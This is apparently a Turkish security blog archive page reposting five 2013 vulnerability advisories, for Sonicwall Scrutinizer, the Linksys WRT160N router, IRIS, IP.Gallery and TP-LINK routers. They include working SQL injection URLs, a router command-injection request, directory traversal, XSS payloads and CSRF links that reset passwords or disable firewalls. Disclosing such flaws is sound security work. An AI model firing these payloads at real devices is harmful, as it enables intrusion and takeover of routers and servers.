Archive for 15 Şubat 2013

Sonicwall Scrutinizer v9.5.2 – SQL Injection Vulnerability

Sonicwall Scrutinizer v9.5.2 – SQL Injection Açığı bulunmuş Olup Açığın oluşum yeri ve Açık hakkındaki açıklamalar aşağıdaki gibidir;

Title:
======
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability


Date:
=====
2013-02-13


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL injection
#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped


VL-ID:
=====
789


Common Vulnerability Scoring System:
====================================
7.3


Introduction:
=============
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool 
to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )



Abstract:
=========
The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application.


Report-Timeline:
================
2012-12-05:	Researcher Notification & Coordination
2012-12-07:	Vendor Notification
2013-01-08:	Vendor Response/Feedback
2013-02-10:	Vendor Fix/Patch
2013-02-11:	Public Disclosure


Status:
========
Published


Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms.
The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or 
gadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of 
the remote sql vulnerability results in dbms & application compromise. 

Vulnerable File(s):
			[+] fa_web.cgi

Vulnerable Module(s):
			[+] gadget listing

Vulnerable Parameter(s):
			[+] orderby
			[+] gadget


Proof of Concept:
=================
The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account 
and also without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27



Solution:
=========
1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection


Risk:
=====
The security risk of the remote sql injection vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright � 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Linksys WRT160N – Multiple Vulnerabilities

Linksys WRT160N – Multiple XSS Post açıkları bulunmuş olup açık hakkında geniş kapsamlı açıklamalar şu şekildedir.

Device Name: Linksys WRT160Nv2
Vendor: Linksys/Cisco

============ Device Description: ============ 

Best For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media

Features:
    * Fast Wireless-N connectivity frees you to do more around your home
    * Easy to set up and use, industrial-strength security protection
    * Great for larger homes with many users

Source: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm

============  Vulnerable Firmware Releases: ============ 

Firmware Version: v2.0.03 build 009

============ Shodan Torks ============ 

Shodan Search: WRT160Nv2
	=>  4072 results

============ Vulnerability Overview: ============ 

* OS Command Injection

	=>  parameter: ping_size

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping 192.168.178.101|&ping_times=5&traceroute_ip=

Change the request methode from HTTP Post to HTTP GET makes the exploitation easier (CSRF):

http://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping 192.168.178.100|&ping_times=5&traceroute_ip=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png

* Directory traversal:

	=>  parameter: next_page
	
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Wireless_Basic.asp
Authorization: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 02:53:16 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png

* XSS

Injecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

	=>  Setup =>  DDNS
	=>  parameter ddns_enable

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/DDNS.asp
Authorization: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

submit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable=';alert('pwnd')//

	=>  Setup =>  Basic Setup
	=>  parameter need_reboot

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/index.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 568

pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=';alert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08 1 1&_daylight_time=1

	=>  Administration =>  Diagnostics
	=>  parameter ping_ip and ping_size
	
POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&#39;>  <script> alert(2) </script> &ping_size=32&#39;>  <script> alert(1) </script> &ping_times=5&traceroute_ip=

It is possible that there are much more XSS Vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities.

* For changing the current password there is no request of the current password

	=>  parameter: http_passwd and http_passwdConfirm

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Management.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 250

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http:// <IP> /apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

Dezember 2012 - discovered vulnerability
23.12.2012 - Contacted Linksys and give them detailed vulnerability details
11.02.2013 - public release

===================== Advisory end =====================

IRIS Citations Management Tool (post auth) Remote Command Execution

IRIS Citations Management Tool (post auth) Uzaktan komut çalıştırma açığı bulunmuş olup aşağıdaki url den exploit dosyasını indirip test edebilirsiniz.

Here is a bug that I finally found time to write about 🙂

https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

The attached contains my mini framework, exploit and screenshot.

Cheers!

~ aeon

# I Read It Somewhere (IRIS) <= v1.3 (post auth) Remote Command Execution # download: http://ireaditsomewhere.googlecode.com # Notes: # - Found this in my archive, duno how long this has been 0Day for... but I had no use for it obviously. # - Yes! ..the code is disgusting, but does the job # - Sorry if I ripped your code, it worked for me and I dont reinvent wheels so thank you! # ~ aeon (https://infosecabsurdity.wordpress.com/) # # Exploit requirements: # ~~~~~~~~~~~~~~~~~~~~~ # # - A valid account as at least a user # - The target to have outgoing internet connectivity Exploit: http://www.exploit-db.com/sploits/24480.tar.gz [/sourcecode]

IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability

IP.Gallery 4.2.x and 5.0.x Persistent XSS Açığı bulunmuş olup, açığın olupum yeri ve açık hakkında açıklamalar şu şekildedir;

# Exploit Title: IP.Gallery 4.2.x and 5.0.x persistent XSS vulnerability

# Date: 8/2/2013

# Exploit Author: Mohamed Ramadan


# Vendor Homepage: http://www.invisionpower.com/

# Software Link: http://www.invisionpower.com/apps/gallery/

# Version: IP.Gallery 4.2.x and 5.0.x


image title is vulnerable to persistent XSS vulnerability which allow any
normal member to hack any administrator account or any other member account.

we contacted the vendor and reported this issue to them and they fixed it
and released this patch:

http://community.invisionpower.com/topic/379028-ipgallery-42x-and-50x-security-update/


Here is a video demonstrating the attack in action :


https://docs.google.com/file/d/0B_cpjifQmPbZMmxVcEdqU3A1aU0/edit?usp=sharing


and here is another video demonstrating how to bypass httponly cookies :


https://docs.google.com/file/d/0B_cpjifQmPbZemFsbFJDRnVkVTA/edit?usp=sharing


 

TP-LINK Admin Panel Multiple CSRF Vulnerabilities

TP-LINK Admin Panel Multiple CSRF Açığı bulunmuş olup, açığın kullanımı ve açık hakkında açıklamalar şu şekildedir;

Advisory Name: Multiple Cross Site Request Forgery vulnerabilities in
TP-LINK Admin Panel

Internal Cybsec Advisory Id: 2013-0208-Multiple CSRF vulnerabilities in
TP-LINK

Vulnerability Class: Cross Site Request Forgery (CSRF)

Release Date: 02/08/2013

Affected Applications: Firmware v3.13.6 Build 110923 Rel.53137n; other
versions may also be affected.

Affected Platforms: WR2543ND or any running the vulnerable firmware.

Local / Remote:  Remote

Severity: Medium � CVSS: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)

Researcher: Juan Manuel Garcia

Vendor Status: Acknowedged / Unpatched

Release Mode: User released

Reference to Vulnerability Disclosure Policy:
http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:

Multiple Cross Site Request Forgery vulnerabilities were found in TP-LINK
Admin Panel, because the application allows authorized users to perform
certain actions via HTTP requests without making proper validity checks to
verify the source of the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits
a malicious web site.

Proof of Concepts:

1)	New Storage Sharing and FTP Server user:
http://server/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save

2)	Disable the Router&#39;s Stateful Inspection Firewall:
http://server/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save

Impact:

An affected user may unintentionally execute actions written by an
attacker. In addition, an attacker may change router settings or gain
unauthorized access
Vendor Response:

2012-10-10 � Vulnerability is identified.
2012-10-11 � Vendor is contacted.
2012-10-12 � Vulnerability details are sent to vendor.
2012-10-17 � Vendor confirms vulnerability and states �This vulnerability
has been escalated to our RD engineer but under current web server
framework it is hard to fix. Our engineer team will modify the web server
framework to fix this. Currently it is under process but will take time�.
2012-10-25 � Cybsec asks the vendor for the planned publication date for
the update.
2012-10-26 � Vendor states �I have no detailed schedule yet�.
2012-12-12 � Cybsec asks if there are any news regarding the solution of
reported vulnerabilities.
2012-12-12 � Vendor states �The fix of this reported vulnerability is not
included in the last firmware upgrade because the web server framework
change is still under development�.
2013-02-01 � Cybsec tells the Vendor that the security advisory will be
published on Wednesday February 6.
2013-02-08 � Having received no reply from TP-Link, vulnerability is
released.

Contact Information:

For more information regarding the vulnerability feel free to contact the
researcher at
jmgarcia  <at>  cybsec  <dot>  com

About CYBSEC S.A. Security Systems

Since 1996, CYBSEC is engaged exclusively in rendering professional
services specialized in Information Security. Their area of services
covers Latin America, Spain and over 250 customers are a proof of their
professional life.

To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is
associated with other software and/or hardware provider companies.

Our services are strictly focused on Information Security, protecting our
clients from emerging security threats, maintaining their IT deployments
available, safe, and reliable.

Beyond professional services, CYBSEC is continuously researching new
defense and attack techniques and contributing with the security community
with high quality information exchange.

For more information, please visit www.cybsec.com
(c) 2010 - CYBSEC S.A. Security Systems